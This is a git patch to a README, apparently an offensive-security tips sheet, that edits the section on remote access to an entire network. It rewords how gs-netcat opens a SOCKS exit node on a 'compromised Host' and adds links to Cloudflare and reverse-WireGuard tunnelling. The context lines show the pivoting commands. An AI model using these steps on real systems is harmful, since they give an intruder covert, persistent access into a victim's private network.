From 32280229f642175ef4770261bf3ec38488e75bc3 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 7 May 2023 08:44:28 +0100
Subject: [PATCH] Update README.md
---
README.md | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index d4a4aee..ba1b2ef 100644
--- a/README.md
+++ b/README.md
@@ -1003,7 +1003,7 @@ c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
**6.iii. Remote Access to an entire network**
-Install [gs-netcat](https://github.com/hackerschoice/gsocket). It creates a SOCKS relay on the Host's private lan which is accessible through the Global Relay network without the need to run your own server (e.g. directly from your workstation):
+Install [gs-netcat](https://github.com/hackerschoice/gsocket). It creates a SOCKS exit-node on the Host's private LAN which is accessible through the Global Socket Relay Network without the need to run your own relay-server (e.g. access the remote private LAN directly from your workstation):
```sh
gs-netcat -l -S # compromised Host
@@ -1016,8 +1016,11 @@ gs-netcat -p 1080 # Your workstation.
# Access route.local:22 on the Host's private LAN from your Workstation:
socat - "SOCKS4a:127.1:route.local:22"
```
+Read [Use any tool via Socks Proxy](#scan-proxy).
-Use -T to use TOR.
+Other methods:
+* [Gost/Cloudflared](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) - our very own article
+* [Reverse Wireguard](https://thc.org/segfault/wireguard) - from segfault.net to any (internal) network.
---